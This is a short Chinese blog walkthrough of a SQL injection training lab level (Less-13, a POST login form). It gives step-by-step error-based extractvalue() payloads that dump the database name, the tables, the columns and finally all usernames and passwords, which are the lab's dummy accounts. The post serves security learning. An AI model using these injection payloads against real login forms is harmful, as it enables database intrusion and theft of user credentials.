zoukankan      html  css  js  c++  java
  • Less(13) POST

    1.发现没有登录成功的返回信息,看来要盲注了

      

     2.报错型:extractvalue()

      (1)爆库:uname=admin') and extractvalue(1,concat(0x7e,(select database())))  and (' &passwd=admin&submit=Submit

        

      (2)爆表:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and (' &passwd=admin&submit=Submit

          

      (3)爆列名:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))  and (' &passwd=admin&submit=Submit

        

         因为没有咱们需要的password,username,把一些不需要的列名消除掉:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login'))))  and (' &passwd=admin&submit=Submit

        

         我们发现后面确实有咱们需要的password,username

      (4)爆值:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))   and (' &passwd=admin&submit=Submit

        

         通过 not in(),我们可以找到所有的用户名和密码:、

        Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

    3.时间型盲注

      这种方法有点费时间,这个参照之前的;

      

  • 相关阅读:
    python爬虫实战(1)--爬取糗事百科
    python爬虫(5)--正则表达式
    python爬虫(4)--Cookie的使用
    python爬虫(3)--异常处理
    python爬虫(2)--Urllib库的高级用法
    EQ2008 LED控制卡二次开发
    C# 遍历对象属性取值赋值
    BootStrap Table
    MongoDB 操作
    SQL Server 2008(R2) 数据库使用外网IP实例连接服务器
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12296172.html
Copyright © 2011-2022 走看看